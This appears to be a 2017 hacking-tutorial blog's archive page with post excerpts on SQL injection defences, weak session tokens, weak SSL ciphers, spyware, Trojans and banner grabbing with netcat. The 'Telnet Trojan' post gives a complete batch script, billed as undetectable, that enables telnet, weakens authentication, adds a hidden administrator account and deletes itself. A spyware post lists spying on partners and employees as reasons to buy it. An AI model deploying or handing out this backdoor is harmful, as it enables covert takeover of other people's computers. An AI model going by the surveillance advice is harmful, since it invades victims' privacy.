Posts

Showing posts from October, 2017

SQL Injection Countermeasures

SQL Injection Countermeasures SQL injection is kinda complex vulnerability and usually applying a fix will differ on which type of application you are developing. By the way instead of its complexity and different types of injection methods SQL injection is one of the easiest to counter. Following are some measures that can be used against SQL injection attack. 1. As told earlier SQL injection attacks occurs due to non-sanitized input. So our first step would be sanitizing input. At developer level build application which explicitly escapes single quotes and apostrophe, do not validate input of expression type for example, 1 + 1, x+ y etc. By sanitizing input by above method you'll be able to stop SQL injection since application will not accept malicious input. 2. The second solution at developer level is to use Application Programming Interface (API's) which disallow SQL injection. Today nearly every web application development tool has an API...

Attacks Against Weak Token Generation

Attacks Against Weak Token Generation During our last post to this we discusses about basics of Session Management Attack which is also known as session hacking. In this post we will have a look on how you can attack weak token generation method to attack session management. Following are most common methods of generating weak tokens, Using meaningful tokens Predictable token generation Adding time dependent variations in tokens Now some important things before we discus real hack steps. In applications that use standard cookie mechanism for transmitting session tokens, it is easy to identify which item of data contains the token. In other cases it needs real brain work to identify them. Many web developers add extra tokens to cookies to fool hackers for example an application might add 14 tokens to yours browser's store, out of which only six are responsible for session management no matter what value other eight have only six of them will hand...

SSL And TLS Attacks | Weak Ciphers

Image
SSL And TLS Attacks | Weak Ciphers Both SSL and TLS protocols works on the basis of Public Key Infrastructure (PKI) and commonly includes key exchange algorithm to handle security. Apart from just CA authority the strength of SSL cipher depends on length of key, encryption algorithm used to encipher data and Message Authentication Code (also known as SSL MAC ). In this post we will have our look on how key length could effect on cipher strength. So depending on the length of initial key generated for data exchange during SSL and TLS communication, ciphers can be divided into following categories. Null Security Ciphers: As name suggests these ciphers do not provide any security since there's no encryption. Weak Security Ciphers: All ciphers with key length less than 128 bits fall under this category. Ciphers using Diffie Hellman algorithm for key exchange are also considered as weak security ciphers since they are vulnerable to man-in-the-midd...

Must Read Before You Buy Spyware

Image
Must Read Before You Buy Spyware Hello visitor, if you are here then surely you are planning to buy spyware and you stopped by just to to know what I want to tell you before you buy one. First of all if you are too lazy to read this article completely because it is little lengthy or you don't want to waste your half second rolling your finger on your mouse and scroll down then please close this window and leave immediately because reading this article incomplete would be good enough to not reading it. There are different reasons for which different people buy spywares . Following are some of them, Spying and monitoring someone Hacking password To put parental control over child's online activity Spy or monitor your love or life partner for cheating on you Spy and monitor employee Controlling and restricting employee's internet abuse during office hours Monitor and restrict network activity of your Local Area Network (LAN) ...

Create Telnet Trojan For Windows Xp

Image
Create Telnet Trojan For Windows Xp Following batch script will act as Telnet Trojan to any windows XP system, the best part of it is it's fully undetectable to all ant-virus programs. Copy following lines in notepad and save with any name with .bat extension for example Trojan.bat. @echo off sc config tlntsvr start=auto sc start tlntsvr tlntadmn config sec=-NTLM tlntadmn config mode=stream net user Devil/add net user Devil 12345 net localgroup administrators Devil /add reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v Devil /t REG_DWORD /d 00000000 del trojan.bat The first line will keep echo of commands off. Second line will ask windows to start telnet server every time the system starts. Third line asks system to start telnet server for current windows NT systems. Fourth line will disable NTLM hash security to password file. Fifth line will add an stream mode to te...

Some Terminologies You Should Know About Trojans

Image
Some Terminologies You Should Know About Trojans in this following post we will discus some most frequently used terminologies that we usually hear when word Trojan pops out. They are discussed here because after knowing them you'll be able to understand how attacker manages to circulate RAT server, hide its presence and also bypasses firewall rules. Over And Covert Channel: A channel here describes means of communication. An overt channel means legal, obvious or known where as covert means hidden and concealed. In other words overt means legal means of communication whereas covert means illegal means of communication. In technical terms overt channel follows rules by TCP/IP suite where as covert channel exploit weakness of TCP/IP model for illegal communication. Wrappers: Wrappers are programs that helps binding two files together. They can bind either multiple files of same extension or multiple files with multiple extension. Wrappers are ...

What Is Spyware

Image
What Is Spyware What is spyware ? A spyware is a piece of malicious code or program installed in system to monitor activities of a person. A spyware is capable of logging key strokes, it can take screen shots and if there is active Internet connection then it can even mail logs to specified email-address or transfer logs to ftp server. Beyond just monitoring it can record your computing habits including which site you browse more, at what time you prefer to be on system or amount of time you spend on computer. A spyware can be used to track all information about your social-networking habits and IRC(Internet Relay Chat) Clients including all major and minor chat clients example: Google Talk, Rediff Messenger, Yahoo Messenger, Microsoft Live Chat, absolutely every thing related to IRC client is exposed to spyware . On the basis of its commercial use and monitoring capabilities spywares are classified as follows, On Basis Of Commercial Use: Domestic ...

Trojan Horse

Image
Trojan Horse The word Trojan horse has been derived from Greek mythology in which Greeks built a huge wooden horse for their soldiers to hide and then placed that horse in front of Troy gates. Troy citizen thought its is gift to them for victory over Greeks and thus Greeks soldiers successfully bypassed the huge wall of Troy and destroyed it. In world of computers and security Trojans are considered as malicious security breaking software or program, which cause considerable amount of damage to both software and hardware of the system. Trojans are written to steal information from other systems and to exercise control over victim PC. They can be used for destructive as well as spying purposes. A computer Trojan horse use to enter victim's PC using a legitimate program and has all privileges that the user has. For example a Trojan can appear as a video or image file, even when you'll open it, you'll see video or image(how we will discus it later...

Some More Methods To Grab Banners

Image
Some More Methods To Grab Banners I hope you enjoyed reading last post on banner grabbing . Here in this post we will discus some tools that can be used to grab banners and we will also have our look on some of the tools that can be used for preventing our banners from getting grabbed. Following are some tools that helps in banner grabbing. NetCat: Net-Cat is TCP/IP debugging tool that can be used for banner grabbing. Download Netcat from its official site, its free. Have a look on its documentation about how to use it. Following command works same as telnet for netcat and helps grabbing banner. C:\netcat\>nc ip_address 80 (Press enter twice and if it doesn't work then type following) (HEAD /HTTP/1.0 and press enter twice) Httprint: Httprint is web server finger printing tool. It uses server signature to identify version of web application running on server. Download it from its official site again its free. I don't think there is ne...